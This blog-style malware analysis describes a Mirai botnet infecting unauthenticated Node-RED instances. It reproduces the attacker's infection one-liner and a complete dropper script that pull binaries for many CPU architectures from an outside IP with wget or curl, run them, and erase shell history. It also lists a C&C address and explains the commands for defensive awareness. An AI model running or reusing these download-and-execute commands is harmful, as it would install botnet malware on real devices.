Mirai Botnet is targeting unauthenticated Node-Red instances
What is “Node-Red”?
“Node-RED is a programming tool for wiring together hardware devices, APIs and online services in new and interesting ways.
It provides a browser-based editor that makes it easy to wire together flows using the wide range of nodes in the palette that can be deployed to its runtime in a single-click.” — source: https://nodered.org/
How did I find this?
I use shodan to find new interesting things, like vulnerable devices, so I can inspect their malwares. Today, I was interested in finding instances of “Node-Red” running online that requires no authentication. To my surprise, I’ve found couple of them quickly. So I inspected them to see if I can find anything there.. aaaand I was right!
How did the infection occur?
The red box, that you see in the screenshot, is the call for the “exec” function in the “Node-Red” to execute system commands on the device:
echo a;cd /tmp || cd /dev/shm || cd ~ ; wget --no-check-certificate http://84.54.51.48/ntpd.sh ; curl -k http://84.54.51.48/ntpd.sh -O ; sh ntpd.sh nodered ; rm ntpd.sh;echo aLet’s break this out to understand what happened:
echo asimply print”a” in the console.
cd /tmp || cd /dev/shm || cd ~This command tries to change the current directory. It uses the || operator to execute the next command only if the previous one fails. It attempts to change to the /tmp directory first, then to /dev/shm, and finally to the user's home directory (~).
wget --no-check-certificate http://84.54.51.48/ntpd.shIf the previous cd command was successful, this command uses wget to download a script (ntpd.sh) from the specified URL (http://84.54.51.48/ntpd.sh). The --no-check-certificate flag is used to skip SSL certificate checks.
curl -k http://84.54.51.48/ntpd.sh -OAlternatively, if wget is not available, this command attempts to download the same script using curl. The -k flag is used to allow connections to SSL sites without certificates, and the -O flag is used to save the downloaded file with the same name as in the URL.
sh ntpd.sh noderedThis command executes the downloaded script (ntpd.sh) with the argument nodered. The script likely performs some installation or configuration related to Node-RED.
rm ntpd.shAfter the script has been executed, this command removes the downloaded script (ntpd.sh) from the system.
So basically, the infection goes like this:
1- download the “malware dropper” from: http://84.54.51.48/ntpd.sh
2- run the dropper.
3- delete the dropper from the system after executing it.
That seems simple but effective !
What is the content of the dropper?
When I downloaded the file from that URL, I got this bash file content:
#!/bin/sh
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.x86 || curl -O http://84.54.51.48/ntpd.x86; cat ./ntpd.x86 > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.x86
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.arm5 || curl -O http://84.54.51.48/ntpd.arm5; cat ./ntpd.arm5 > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.arm5
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.arm6 || curl -O http://84.54.51.48/ntpd.arm6; cat ./ntpd.arm6 > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.arm6
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.arm || curl -O http://84.54.51.48/ntpd.arm; cat ./ntpd.arm > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.arm
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.arm7 || curl -O http://84.54.51.48/ntpd.arm7; cat ./ntpd.arm7 > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.arm7
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.mips || curl -O http://84.54.51.48/ntpd.mips; cat ./ntpd.mips > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.mips
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.mipsel || curl -O http://84.54.51.48/ntpd.mipsel; cat ./ntpd.mipsel > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.mipsel
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.sh4 || curl -O http://84.54.51.48/ntpd.sh4; cat ./ntpd.sh4 > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.sh4
# cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.i686 || curl -O http://84.54.51.48/ntpd.i686; cat ./ntpd.i686 > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.i686
# cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.i586 || curl -O http://84.54.51.48/ntpd.i586; cat ./ntpd.i586 > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.i586
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.m68k || curl -O http://84.54.51.48/ntpd.m68k; cat ./ntpd.m68k > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.m68k
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.spc || curl -O http://84.54.51.48/ntpd.spc; cat ./ntpd.spc > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.spc
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.ppc || curl -O http://84.54.51.48/ntpd.ppc; cat ./ntpd.ppc > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.ppc
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd ~ || cd /; wget http://84.54.51.48/ntpd.arc || curl -O http://84.54.51.48/ntpd.arc; cat ./ntpd.arc > ./ntpd; chmod +x ./ntpd || chmod 777 ./ntpd; ./ntpd $1; rm -f ./ntpd ./ntpd.arc
rm -rf ntpd.sh ~/.*HIST* ~/.*hist*Each line goes exactly as the infection command above, but each line result in downloading and execution attempt of different binanry file. So the attacker here is attempting to download all the available compiled versions of the malware and execute them one by one, so he can save the time of figuring out what’s the correct architecture and which version to download exactly. Lazy.. but still effective apparently! The result is that one of them will eventually be executed and the machine becomes infected and joins the botnet!
I’ve downloaded one of the files and then uploaded it to VirusTotal and this was the result:
I didn’t want to bother myself with reverse engineering it since that probably has already been done by other people, but I did extract the C&C server’s IP address: “214.194.12.158”
I hope you enjoyed my article! See you the next time.
